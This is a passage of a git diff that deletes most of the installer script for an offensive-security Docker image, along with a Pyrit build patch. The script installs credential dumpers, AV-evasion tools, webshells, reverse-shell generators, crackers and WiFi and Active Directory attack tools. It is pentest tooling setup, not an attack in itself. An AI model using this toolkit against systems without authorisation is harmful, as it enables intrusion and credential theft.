cd /opt/tools/Certipy - python3 -m pipx install . -} - -function install_eaphammer() { - colorecho "Installing EPA hammer" - git -C /opt/tools/ clone https://github.com/s0lst1c3/eaphammer - cd /opt/tools/eaphammer - echo y | ./kali-setup -} - -function download_hashcat_rules() { - colorecho "Download hashcat rules" - mkdir -p /opt/resources/cracking/hashcat_rules/ - git -C /opt/resources/cracking/hashcat_rules/ clone https://github.com/NSAKEY/nsa-rules - wget -O /opt/resources/cracking/hashcat_rules/hob064.rule https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule - wget -O /opt/resources/cracking/hashcat_rules/d3adhob0.rule https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule - wget -O /opt/resources/cracking/hashcat_rules/OneRuleToRuleThemAll.rule https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule -} - -function install_vulny_code_static_analysis() { - colorecho "Installing Vulny Code Static Analysis" - git -C /opt/tools/ clone https://github.com/swisskyrepo/Vulny-Code-Static-Analysis -} - -function install_GPOwned() { - colorecho "Installing GPOwned" - git -C /opt/tools/ clone https://github.com/X-C3LL/GPOwned -} - -function install_nuclei() { - # Vulnerability scanner - colorecho "Installing Nuclei" - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest - nuclei -update-templates -} - -function install_prips() { - # Print the IP addresses in a given range - colorecho "Installing Prips" - fapt prips -} - -function install_hakrevdns() { - # Reverse DNS lookups - colorecho "Installing Hakrevdns" - go install github.com/hakluke/hakrevdns@latest -} - -function install_httprobe() { - colorecho "Installing httprobe" - go install -v github.com/tomnomnom/httprobe@latest -} - -function install_httpx() { - colorecho "Installing httpx" - python3 -m pipx install 'httpx[cli]' -} - -function install_tor() { - colorecho "Installing tor" - mkdir /opt/tools/tor - cd /opt/tools/tor - wget https://dist.torproject.org/tor-0.4.3.7.tar.gz - tar xf tor-0.4.3.7.tar.gz - cd tor-0.4.3.7 - apt install libevent-dev - ./configure - make install -} - -function install_pwndb() { - colorecho "Installing pwndb" - git -C /opt/tools/ clone https://github.com/davidtavarez/pwndb.git - cd /opt/tools/pwndb - chmod +x pwndb.py -} - -function install_robotstester() { - # This Python script can enumerate all URLs present in robots.txt files, and test whether they can be accessed or not. - # https://github.com/p0dalirius/robotstester - colorecho "Installing Robotstester" - git -C /opt/tools/ clone https://github.com/p0dalirius/robotstester.git - cd /opt/tools/robotstester - python3 setup.py install -} - -function install_finduncommonshares() { - colorecho "Installing FindUncommonShares" - git -C /opt/tools/ clone https://github.com/p0dalirius/FindUncommonShares - cd /opt/tools/FindUncommonShares/ - python3 -m pip install -r requirements.txt -} - -function install_shadowcoerce() { - colorecho "Installing ShadowCoerce PoC" - git -C /opt/tools/ clone https://github.com/ShutdownRepo/ShadowCoerce -} - -function install_pwncat() { - colorecho "Installing pwncat" - python3 -m pipx install pwncat-cs -} - -function the_hacker_recipes() { - colorecho "Adding The Hacker Recipes to the resources" - git -C /opt/resources/ clone https://github.com/ShutdownRepo/The-Hacker-Recipes -} - -function install_dcsync() { - colorecho "Installing DCSync.py" - git -C /opt/tools/ clone https://github.com/n00py/DCSync -} - -function install_gMSADumper() { - colorecho "Installing gMSADumper" - git -C /opt/tools/ clone https://github.com/micahvandeusen/gMSADumper -} - -function install_modifyCertTemplate() { - colorecho "Installing modifyCertTemplate" - git -C /opt/tools/ clone https://github.com/fortalice/modifyCertTemplate -} - -function install_pylaps() { - colorecho "Installing pyLAPS" - git -C /opt/tools/ clone https://github.com/p0dalirius/pyLAPS -} - -function install_ldaprelayscan() { - colorecho "Installing LdapRelayScan" - git -C /opt/tools/ clone https://github.com/zyn3rgy/LdapRelayScan - cd /opt/tools/LdapRelayScan - python3 -m pip install -r requirements.txt -} - -function install_goldencopy() { - colorecho "Installing GoldenCopy" - git -C /opt/tools/ clone https://github.com/Dramelac/GoldenCopy - cd /opt/tools/GoldenCopy - python3 -m pip install -r requirements.txt -} - -function install_base() { - update || exit - echo $VERSION > /opt/.exegol_version - echo '# Debian sources' | tee -a /etc/apt/sources.list - echo 'deb http://deb.debian.org/debian/ bullseye main' | tee -a /etc/apt/sources.list - echo 'deb-src http://deb.debian.org/debian/ bullseye main' | tee -a /etc/apt/sources.list - echo 'deb http://security.debian.org/debian-security bullseye-security main contrib' | tee -a /etc/apt/sources.list - echo 'deb-src http://security.debian.org/debian-security bullseye-security main contrib' | tee -a /etc/apt/sources.list - echo 'deb http://deb.debian.org/debian/ bullseye-updates main contrib' | tee -a /etc/apt/sources.list - echo 'deb-src http://deb.debian.org/debian/ bullseye-updates main contrib' | tee -a /etc/apt/sources.list - apt-get update - fapt man # Most important - fapt git # Git client - fapt lsb-release - fapt pciutils - fapt zip - fapt unzip - fapt kmod -# fapt gifsicle - fapt sudo # Sudo - fapt curl # HTTP handler - fapt wget # Wget - fapt python3-pyftpdlib # FTP server python library - fapt php # Php language - fapt python2 # Python 2 language - fapt python3 # Python 3 language - fapt python2-dev # Python 2 language (dev version) - fapt python3-dev # Python 3 language (dev version) - fapt python3.9-venv - ln -s /usr/bin/python2.7 /usr/bin/python # fix shit - python-pip # Pip - fapt python3-pip # Pip - filesystem - locales - tmux # Tmux - fapt zsh # Awesome shell - install_ohmyzsh # Awesome shell - fapt python-setuptools - fapt python3-setuptools - python3 -m pip install wheel - python -m pip install wheel - install_fzf # File fuzzer - install_grc - fapt npm # Node Package Manager - install_nvm - fapt golang # Golang language - fapt gem # Install ruby packages - fapt automake # Automake - fapt autoconf # Autoconf - fapt make - fapt gcc - fapt g++ - fapt file # Detect type of file with magic number - fapt lsof # Linux utility - fapt less # Linux utility - fapt x11-apps # Linux utility - fapt net-tools # Linux utility - fapt vim # Text editor - install_ultimate_vimrc # Make vim usable OOFB - fapt nano # Text editor (not the best) - fapt emacs-nox - fapt jq # jq is a lightweight and flexible command-line JSON processor - fapt iputils-ping # Ping binary - fapt iproute2 # Firewall rules - fapt openvpn - install_mdcat # cat markdown files - install_bat # Beautiful cat - fapt tidy # TODO: comment this - fapt amap # TODO: comment this - fapt mlocate # TODO: comment this - fapt xsel # TODO: comment this - fapt libtool # TODO: comment this - fapt dnsutils # DNS utilities like dig and nslookup - fapt dos2unix # Convert encoded dos script - DEBIAN_FRONTEND=noninteractive fapt macchanger # Macchanger - fapt samba # Samba - fapt ftp # FTP client - fapt ssh # SSH client - fapt sshpass # SSHpass (wrapper for using SSH with password on the CLI) - fapt telnet # Telnet client - fapt nfs-common # NFS client - fapt snmp # TODO: comment this - fapt ncat # Socket manager - fapt netcat-traditional # Socket manager - fapt socat # Socket manager - #gf_install # wrapper around grep - fapt rdate # tool for querying the current time from a network server - fapt putty # GUI-based SSH, Telnet and Rlogin client - fapt screen # CLI-based PuTT-like - fapt p7zip-full # 7zip - fapt p7zip-rar # 7zip rar module - fapt rar # rar - fapt unrar # unrar - fapt xz-utils # xz (de)compression - fapt xsltproc # apply XSLT stylesheets to XML documents (Nmap reports) - install_pipx - fapt parallel - fapt tree - fapt faketime -} - -# Package dedicated to most used offensive tools -function install_most_used_tools() { - fapt exploitdb # Exploitdb downloaded locally - fapt metasploit-framework # Offensive framework - fapt nmap # Port scanner - fapt seclists # Awesome wordlists - install_subfinder # Subdomain bruteforcer - install_autorecon # External recon tool - install_waybackurls # Website history - install_theHarvester # Gather emails, subdomains, hosts, employee names, open ports and banners - install_simplyemail # Gather emails - install_gobuster # Web fuzzer (pretty good for several extensions) - install_ffuf # Web fuzzer (little favorites) - fapt wfuzz # Web fuzzer (second favorites) - fapt nikto # Web scanner - fapt sqlmap # SQL injection scanner - fapt hydra # Login scanner - fapt joomscan # Joomla scanner - fapt wpscan # Wordpress scanner - install_droopescan # Drupal scanner - install_drupwn # Drupal scanner - install_testssl # SSL/TLS scanner - fapt sslscan # SSL/TLS scanner - fapt weevely # Awesome secure and light PHP webshell - install_CloudFail # Cloudflare misconfiguration detector - install_EyeWitness # Website screenshoter - install_wafw00f # Waf detector - install_jwt_tool # Toolkit for validating, forging, scanning and tampering JWTs - install_gittools # Dump a git repository from a website - install_ysoserial # Deserialization payloads - install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner - install_impacket # Network protocols scripts - fapt enum4linux # Hosts enumeration - fapt mimikatz # AD vulnerability exploiter - fapt smbclient # Small dynamic library that allows iOS apps to access SMB/CIFS file servers - fapt smbmap # Allows users to enumerate samba share drives across an entire domain - install_nuclei # Vulnerability scanner - evilwinrm # WinRM shell - install_john # Password cracker - fapt hashcat # Password cracker - download_hashcat_rules - fapt fcrackzip # Zip cracker -} - -# Package dedicated to offensive miscellaneous tools -function install_misc_tools() { - fapt exploitdb # Exploitdb downloaded locally - fapt rlwrap # Reverse shell utility - install_shellerator # Reverse shell generator - install_uberfile # file uploader/downloader commands generator - arsenal # Cheatsheets tool - install_trilium # notes taking tool - fapt exiftool # Meta information reader/writer - fapt imagemagick # Copy, modify, and distribute image - install_ngrok # expose a local development server to the Internet - install_whatportis # Search default port number - fapt ascii # The ascii table in the shell -} - -# Package dedicated to the installation of wordlists and tools like wl generators -function install_wordlists_tools() { - fapt crunch # Wordlist generator - fapt seclists # Awesome wordlists - fapt wordlists # Others wordlists (not the best) - fapt cewl # Wordlist generator - fapt cupp # User password profiler - install_pass_station # Default credentials database -} - -# Package dedicated to offline cracking/bruteforcing tools -function install_cracking_tools() { - fapt hashcat # Password cracker - download_hashcat_rules - install_john # Password cracker - fapt fcrackzip # Zip cracker - fapt pdfcrack # PDF cracker - fapt bruteforce-luks # Find the password of a LUKS encrypted volume - install_nth # Name-That-Hash, the hash identifier tool -} - -# Package dedicated to osint, recon and passive tools -function install_osint_tools() { - #Picture And Videos - youtubedl # Command-line program to download videos from YouTube.com and other video sites - apt-get update - fapt exiftool # For read exif information - fapt exifprobe # Probe and report structure and metadata content of camera image files - #Subdomain - Sublist3r # Fast subdomains enumeration tool - assetfinder # Find domains and subdomains potentially related to a given domain - install_subfinder # Subfinder is a subdomain discovery tool that discovers valid subdomains for websites - fapt amass # OWASP Amass tool suite is used to build a network map of the target - findomain # Findomain Monitoring Service use OWASP Amass, Sublist3r, Assetfinder and Subfinder - #DNS - fapt dnsenum # DNSEnum is a command-line tool that automatically identifies basic DNS records - fapt dnsrecon # DNS Enumeration Script - #Email - holehe # Check if the mail is used on different sites - install_simplyemail # Gather emails - install_theHarvester # Gather emails, subdomains, hosts, employee names, open ports and banners - h8mail # Email OSINT & Password breach hunting tool - infoga # Gathering email accounts informations - buster # An advanced tool for email reconnaissance - pwnedornot # OSINT Tool for Finding Passwords of Compromised Email Addresses - ghunt # Investigate Google Accounts with emails - #Phone - phoneinfoga # Advanced information gathering & OSINT framework for phone numbers - #Social Network - maigret_pip # Search pseudos and information about users on many platforms - linkedin2username # Generate username lists for companies on LinkedIn - toutatis # Toutatis is a tool that allows you to extract information from instagrams accounts - tiktokscraper # TikTok Scraper. Download video posts, collect user/trend/hashtag/music feed metadata, sign URL and etc - #Website - install_waybackurls # Website history - carbon14 # OSINT tool for estimating when a web page was written - WikiLeaker # A WikiLeaks scraper - photon # Incredibly fast crawler designed for OSINT. - install_CloudFail # Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network - #Ip - ipinfo # Get information about an IP address using command line with ipinfo.io - #Data visualization - constellation # A graph-focused data visualisation and interactive analysis application. - #Framework - apt-get update - fapt maltego # Maltego is a software used for open-source intelligence and forensics - fapt spiderfoot # SpiderFoot automates OSINT collection - fapt finalrecon # A fast and simple python script for web reconnaissance - fapt recon-ng # External recon tool - # TODO : http://apt.vulns.sexy make apt update print a warning, and the repo has a weird name, we need to fix this in order to not alarm users - # sn0int # Semi-automatic OSINT framework and package manager - OSRFramework # OSRFramework, the Open Sources Research Framework - #Dark - apt-get update - install_tor # Tor proxy - fapt torbrowser-launcher # Tor browser - onionsearch # OnionSearch is a script that scrapes urls on different .onion search engines. - install_pwndb # No need to say more, no ? Be responsible with this tool please ! - #Github - githubemail # Retrieve a GitHub user's email even if it's not public - #Other - apt-get update - fapt whois # See information about a specific domain name or IP address - ReconDog # Informations gathering tool - JSParser # Parse JS files - gron # JSON parser - #install_ignorant # holehe but for phone numbers -} - -# Package dedicated to applicative and active web pentest tools -function install_web_tools() { - install_gobuster # Web fuzzer (pretty good for several extensions) - install_kiterunner # Web fuzzer (fast and pretty good for api bruteforce) - amass # Web fuzzer - install_ffuf # Web fuzzer (little favorites) - fapt dirb # Web fuzzer - fapt dirbuster # Web fuzzer - fapt wfuzz # Web fuzzer (second favorites) - install_dirsearch # Web fuzzer - fapt nikto # Web scanner - fapt sqlmap # SQL injection scanner - SSRFmap # SSRF scanner - gopherus # SSRF helper - NoSQLMap # NoSQL scanner - XSStrike # XSS scanner - install_XSpear # XSS scanner - fapt xsser # XSS scanner - xsrfprobe # CSRF scanner - Bolt # CSRF scanner - fapt dotdotpwn # LFI scanner - kadimus # LFI scanner - fuxploider # File upload scanner - Blazy # Login scanner - fapt patator # Login scanner - fapt joomscan # Joomla scanner - fapt wpscan # Wordpress scanner - install_droopescan # Drupal scanner - install_drupwn # Drupal scanner - install_cmsmap # CMS scanner (Joomla, Wordpress, Drupal) - install_moodlescan # Moodle scanner - install_testssl # SSL/TLS scanner - fapt sslscan # SSL/TLS scanner - fapt weevely # Awesome secure and light PHP webshell - install_CloudFail # Cloudflare misconfiguration detector - install_EyeWitness # Website screenshoter - OneForAll # TODO: comment this - install_wafw00f # Waf detector - CORScanner # CORS misconfiguration detector - hakrawler # Web endpoint discovery - LinkFinder # Discovers endpoint JS files - timing_attack # Cryptocraphic timing attack - updog # New HTTPServer - install_jwt_tool # Toolkit for validating, forging, scanning and tampering JWTs - jwt_cracker # JWT cracker and bruteforcer - wuzz # Burp cli - install_git-dumper # Dump a git repository from a website - install_gittools # Dump a git repository from a website - fapt padbuster - install_ysoserial # Deserialization payloads - fapt whatweb # Recognises web technologies including content management - phpggc # php deserialization payloads - symfony_exploits #  symfony secret fragments exploit - jdwp_shellifier # exploit java debug - install_httpmethods # Tool for HTTP methods enum & verb tampering - install_h2csmuggler # Tool for HTTP2 smuggling - install_byp4xx # Tool to automate 40x errors bypass attempts - install_feroxbuster # ffuf but with multithreaded recursion - install_tomcatwardeployer # Apache Tomcat auto WAR deployment & pwning tool - install_clusterd # Axis2/JBoss/ColdFusion/Glassfish/Weblogic/Railo scanner - install_arjun # HTTP Parameter Discovery - install_gau - install_nuclei # Vulnerability scanner - install_prips # Print the IP addresses in a given range - install_hakrevdns # Reverse DNS lookups - install_httprobe - install_httpx - install_robotstester # Robots.txt scanner -# install_gitrob # Senstive files reconnaissance in github -} - -# Package dedicated to command & control frameworks -function install_c2_tools() { - Empire # Exploit framework - fapt metasploit-framework # Offensive framework - install_routersploit # Exploitation Framework for Embedded Devices - install_pwncat # netcat and rlwrap on steroids to handle revshells, automates a few things too - # TODO: add Silentrinity - # TODO: add starkiller - # TODO: add beef-xss -} - -# Package dedicated to specific services tools apart from HTTP/HTTPS (e.g. SSH, and so on) -install_services_tools() { - fapt ssh-audit # SSH server audit - fapt hydra # Login scanner - memcached-cli # TODO: comment this - fapt mariadb-client # Mariadb client - fapt redis-tools # Redis protocol - install_odat # Oracle Database Attacking Tool -} - -# Package dedicated to internal Active Directory tools -function install_ad_tools() { - install_responder # LLMNR, NBT-NS and MDNS poisoner - install_crackmapexec # Network scanner - sprayhound # Password spraying tool - install_smartbrute # Password spraying tool - install_bloodhound.py # AD cartographer - neo4j_install # Bloodhound dependency - cypheroth # Bloodhound dependency - # mitm6_sources # Install mitm6 from sources - mitm6_pip # DNS server misconfiguration exploiter - aclpwn # ACL exploiter - # IceBreaker # TODO: comment this - dementor # SpoolService exploiter - install_impacket # Network protocols scripts - pykek # AD vulnerability exploiter - install_lsassy # Credentials extracter - privexchange # Exchange exploiter - ruler # Exchange exploiter - darkarmour # Windows AV evasion - amber # AV evasion - powershell # Windows Powershell for Linux - krbrelayx # Kerberos unconstrained delegation abuse toolkit - rbcd-attack # Kerberos Resource-Based Constrained Delegation Attack - rbcd-permissions # Kerberos Resource-Based Constrained Delegation Attack - evilwinrm # WinRM shell - pypykatz # Mimikatz implementation in pure Python - enyx # Hosts discovery - fapt enum4linux # Hosts enumeration - enum4linux-ng # Hosts enumeration - zerologon # Exploit for zerologon cve-2020-1472 - libmspack # Library for some loosely related Microsoft compression format - peas_offensive # Library and command line application for running commands on Microsoft Exchange - windapsearch-go # Active Directory Domain enumeration through LDAP queries - oaburl_py # Send request to the MS Exchange Autodiscover service - LNKUp - fapt mimikatz # AD vulnerability exploiter - fapt samdump2 # Dumps Windows 2k/NT/XP/Vista password hashes - fapt smbclient # Small dynamic library that allows iOS apps to access SMB/CIFS file servers - fapt smbmap # Allows users to enumerate samba share drives across an entire domain - fapt passing-the-hash # Pass the hash attack - fapt smtp-user-enum # SMTP user enumeration via VRFY, EXPN and RCPT - fapt onesixtyone # SNMP scanning - fapt nbtscan # NetBIOS scanning tool - fapt rpcbind # RPC scanning - fapt gpp-decrypt # Decrypt a given GPP encrypted string - ntlmv1-multi # NTLMv1 multi tools: modifies NTLMv1/NTLMv1-ESS/MSCHAPv2 - hashonymize # Anonymize NTDS, ASREProast, Kerberoast hashes for remote cracking - install_gosecretsdump # secretsdump in Go for heavy files - install_adidnsdump # enumerate DNS records in Domain or Forest DNS zones - install_powermad # MachineAccountQuota and DNS exploit tools - install_snaffler # Shares enumeration and looting - install_pygpoabuse # TODO : comment this - install_bloodhound-import # Python script to import BH data to a neo4j db - install_bloodhound-quickwin # Python script to find quickwins from BH data in a neo4j db - install_ldapsearch-ad # Python script to find quickwins from basic ldap enum - install_ntlm-scanner # Python script to check public vulns on DCs - install_petitpotam # Python script to coerce auth through MS-EFSR abuse - install_PKINITtools # Python scripts to use kerberos PKINIT to obtain TGT - install_pywhisker # Python script to manipulate msDS-KeyCredentialLink - install_manspider # Snaffler-like in Python - install_targetedKerberoast - install_pcredz - install_pywsus - install_donpapi - install_webclientservicescanner - install_certipy - npm install ntpsync # sync local time with remote server - install_shadowcoerce - install_dcsync - install_gMSADumper - install_modifyCertTemplate - install_pylaps - install_finduncommonshares - install_ldaprelayscan - install_goldencopy -} - -# Package dedicated to mobile apps pentest tools -function install_mobile_tools() { - fapt android-tools-adb - fapt smali - fapt dex2jar - fapt zipalign - fapt apksigner - fapt apktool - install_frida - install_androguard # Reverse engineering and analysis of Android applications -} - -# Package dedicated to VOIP/SIP pentest tools -function install_voip_tools() { - install_sipvicious # Set of tools for auditing SIP based VOIP systems - #TODO: SIPp? -} - -# Package dedicated to RFID/NCF pentest tools -function install_rfid_tools() { - fapt git - fapt libusb-dev - fapt autoconf - fapt nfct - install_pcsc - install_libnfc # NFC library - install_mfoc # Tool for nested attack on Mifare Classic - install_mfcuk # Tool for Darkside attack on Mifare Classic - install_libnfc-crypto1-crack # tool for hardnested attack on Mifare Classic - install_mfdread # Tool to pretty print Mifare 1k/4k dumps - install_proxmark3 # Proxmark3 scripts -} - -# Package dedicated to IoT tools -function install_iot_tools() { - fapt avrdude - fapt minicom -} - -# Package dedicated to SDR -function install_sdr_tools() { - install_mousejack # tools for mousejacking - install_jackit # tools for mousejacking - install_hackrf # tools for hackrf - install_gqrx # spectrum analyzer for SDR - fapt rtl-433 # decode radio transmissions from devices on the ISM bands - # TODO : ubertooth, ... -} - -# Package dedicated to network pentest tools -function install_network_tools() { - install_proxychains # Network tool - DEBIAN_FRONTEND=noninteractive fapt wireshark # Wireshark packet sniffer - DEBIAN_FRONTEND=noninteractive fapt tshark # Tshark packet sniffer - # wireshark_sources # Install Wireshark from sources - fapt hping3 # Discovery tool - fapt masscan # Port scanner - fapt nmap # Port scanner - install_autorecon # External recon tool - # Sn1per # Vulnerability scanner - fapt tcpdump # Capture TCP traffic - install_dnschef # Python DNS server - install_rustscan # Fast port scanner - install_divideandscan # Python project to automate port scanning routine - fapt iptables # iptables for the win - fapt traceroute # ping ping - install_chisel # Fast TCP/UDP tunnel over HTTP - install_sshuttle # Transparent proxy over SSH - fapt dns2tcp # TCP tunnel over DNS - install_eaphammer -} - -# Package dedicated to wifi pentest tools -function install_wifi_tools() { - pyrit # Databases of pre-computed WPA/WPA2-PSK authentication phase - wifite2 # Retrieving password of a wireless access point (router) - fapt aircrack-ng # WiFi security auditing tools suite - fapt hostapd-wpe # Modified hostapd to facilitate AP impersonation attacks - fapt reaver # Brute force attack against Wifi Protected Setup - fapt bully # WPS brute force attack - fapt cowpatty # WPA2-PSK Cracking - bettercap_install # MiTM tool - hcxtools # Tools for PMKID and other wifi attacks - hcxdumptool # Small tool to capture packets from wlan devices -} - -# Package dedicated to forensic tools -function install_forensic_tools() { - fapt pst-utils # Reads a PST and prints the tree structure to the console - fapt binwalk # Tool to find embedded files - fapt foremost # Alternative to binwalk - install_volatility # Memory analysis tool - install_trid # filetype detection tool - install_peepdf # PDF analysis -} - -# Package dedicated to steganography tools -function install_steganography_tools() { - install_zsteg # Detect stegano-hidden data in PNG & BMP - fapt stegosuite - fapt steghide - install_stegolsb # (including wavsteg) -} - -# Package dedicated to cloud tools -function install_cloud_tools() { - kubectl - awscli - install_scout # Multi-Cloud Security Auditing Tool -} - -# Package dedicated to reverse engineering tools -function install_reverse_tools() { - pwntools # CTF framework and exploit development library - pwndbg # Advanced Gnu Debugger - angr # Binary analysis - checksec_py # Check security on binaries - fapt nasm # Netwide Assembler - fapt radare2 # Awesome debugger - fapt wabt # The WebAssembly Binary Toolkit - fapt ltrace - fapt strace -} - -# Package dedicated to attack crypto -function install_crypto_tools() { -# install_rsactftool # attack rsa -# todo : this function fails and make the whole build stop, temporarily removing - echo "nothing to install" -} - -# Package dedicated to GUI-based apps -function install_GUI_tools() { - bloodhound - bloodhound_old_v3 - bloodhound_old_v2 - fapt freerdp2-x11 - fapt rdesktop - ghidra - fapt xtightvncviewer - fapt jd-gui # Java decompiler - burp -} - -# Package dedicated to SAST and DAST tools -function install_code_analysis_tools() { - install_vulny_code_static_analysis -} - -# Package dedicated to the download of resources -function install_resources() { - sysinternals - winenum - pspy - peass - linux_smart_enumeration - linenum - linux_exploit_suggester - mimikatz - nishang - powersploit - privesccheck - rubeus - inveigh - sharphound - juicypotato - impacket_windows - nc - spoolsample - diaghub - lazagne - sublinacl - mimipenguin - mimipy - plink - deepce - rockyou - webshells - mailsniper - ysoserial_net - bitleaker - napper - http-put-server - azurehound - icmpdoor - sharpcollection - the_hacker_recipes -} - -# Function used to clean up post-install files -function install_clean() { - colorecho "Cleaning..." - rm -rfv /tmp/* -} - -# Entry point for the installation -if [[ $EUID -ne 0 ]]; then - echo -e "${RED}" - echo "You must be a root user" 2>&1 - echo -e "${NOCOLOR}" - exit 1 -else - if declare -f "$1" > /dev/null - then - if [[ -f '/.dockerenv' ]]; then - echo -e "${GREEN}" - echo "This script is running in docker, as it should :)" - echo "If you see things in red, don't panic, it's usually not errors, just badly handled colors" - echo -e "${NOCOLOR}${BLUE}" - echo "A successful build will output the following last line:" - echo " Successfully tagged nwodtuhs/exegol:latest" - echo -e "${NOCOLOR}" - sleep 2 - "$@" - else - echo -e "${RED}" - echo "[!] Careful : this script is supposed to be run inside a docker/VM, do not run this on your host unless you know what you are doing and have done backups. You are warned :)" - echo "[*] Sleeping 30 seconds, just in case... You can still stop this" - echo -e "${NOCOLOR}" - sleep 30 - "$@" - fi - else - echo "'$1' is not a known function name" >&2 - exit 1 - fi -fi diff --git a/sources/patches/undefined-symbol-aesni-key.patch b/sources/patches/undefined-symbol-aesni-key.patch deleted file mode 100644 index 1b87eb43..00000000 --- a/sources/patches/undefined-symbol-aesni-key.patch +++ /dev/null @@ -1,155 +0,0 @@ -diff --git a/cpyrit/_cpyrit_cpu.c b/cpyrit/_cpyrit_cpu.c -index 137d87d..f4f8e67 100644 ---- a/cpyrit/_cpyrit_cpu.c -+++ b/cpyrit/_cpyrit_cpu.c -@@ -1077,70 +1077,70 @@ ccmp_encrypt_openssl(const unsigned char *A0, const unsigned char *S0, const uns - return -1; - } - --#ifdef COMPILE_AESNI -- inline __m128i -- aesni_key(__m128i a, __m128i b) -- { -- __m128i t; -- -- b = _mm_shuffle_epi32(b, 255); -- t = _mm_slli_si128(a, 4); -- a = _mm_xor_si128(a, t); -- t = _mm_slli_si128(t, 4); -- a = _mm_xor_si128(a, t); -- t = _mm_slli_si128(t, 4); -- a = _mm_xor_si128(a, t); -- a = _mm_xor_si128(a, b); -- -- return a; -- } -- -- static Py_ssize_t -- ccmp_encrypt_aesni(const unsigned char *A0, const unsigned char *S0, const unsigned char *tkbuffer, Py_ssize_t keycount) -- { -- __m128i roundkey, state; -- Py_ssize_t i; -- unsigned char crib[16]; -- -- for (i = 0; i < keycount; i++) -- { -- /* Setup round key from main key */ -- roundkey = _mm_loadu_si128((__m128i*)&tkbuffer[i * 16]); -- -- /* Get plaintext and XOR it with key to get AES-state */ -- state = _mm_loadu_si128((__m128i*)A0); -- state = _mm_xor_si128(state, roundkey); -- -- /* Perform 10 AES-rounds on the state using the derived round keys */ -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 1)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 2)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 4)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 8)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 16)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 32)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 64)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 128)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 27)); -- state = _mm_aesenc_si128(state, roundkey); -- roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 54)); -- state = _mm_aesenclast_si128 (state, roundkey); -- -- _mm_storeu_si128 (&((__m128i*)crib)[0], state); -- if (memcmp(crib, S0, 6) == 0) -- return i; -- } -- -- return -1; -- } --#endif /* COMPILE_AESNI */ -+//#ifdef COMPILE_AESNI -+// inline __m128i -+// aesni_key(__m128i a, __m128i b) -+// { -+// __m128i t; -+// -+// b = _mm_shuffle_epi32(b, 255); -+// t = _mm_slli_si128(a, 4); -+// a = _mm_xor_si128(a, t); -+// t = _mm_slli_si128(t, 4); -+// a = _mm_xor_si128(a, t); -+// t = _mm_slli_si128(t, 4); -+// a = _mm_xor_si128(a, t); -+// a = _mm_xor_si128(a, b); -+// -+// return a; -+// } -+// -+// static Py_ssize_t -+// ccmp_encrypt_aesni(const unsigned char *A0, const unsigned char *S0, const unsigned char *tkbuffer, Py_ssize_t keycount) -+// { -+// __m128i roundkey, state; -+// Py_ssize_t i; -+// unsigned char crib[16]; -+// -+// for (i = 0; i < keycount; i++) -+// { -+// /* Setup round key from main key */ -+// roundkey = _mm_loadu_si128((__m128i*)&tkbuffer[i * 16]); -+// -+// /* Get plaintext and XOR it with key to get AES-state */ -+// state = _mm_loadu_si128((__m128i*)A0); -+// state = _mm_xor_si128(state, roundkey); -+// -+// /* Perform 10 AES-rounds on the state using the derived round keys */ -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 1)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 2)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 4)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 8)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 16)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 32)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 64)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 128)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 27)); -+// state = _mm_aesenc_si128(state, roundkey); -+// roundkey = aesni_key(roundkey, _mm_aeskeygenassist_si128(roundkey, 54)); -+// state = _mm_aesenclast_si128 (state, roundkey); -+// -+// _mm_storeu_si128 (&((__m128i*)crib)[0], state); -+// if (memcmp(crib, S0, 6) == 0) -+// return i; -+// } -+// -+// return -1; -+// } -+//#endif /* COMPILE_AESNI */ - - PyDoc_STRVAR(CCMPCracker_solve__doc__, - "solve(object) -> solution or None\n\n" -diff --git a/cpyrit/cpufeatures.h b/cpyrit/cpufeatures.h -index 6f93d60..dfc1096 100644 ---- a/cpyrit/cpufeatures.h -+++ b/cpyrit/cpufeatures.h -@@ -33,8 +33,8 @@ - } - #endif - --#if (defined(__AES__) && defined(__PCLMUL__)) -- #define COMPILE_AESNI --#endif -+//#if (defined(__AES__) && defined(__PCLMUL__)) -+// #define COMPILE_AESNI -+//#endif - - #endif /* CPUFEATURES */ diff 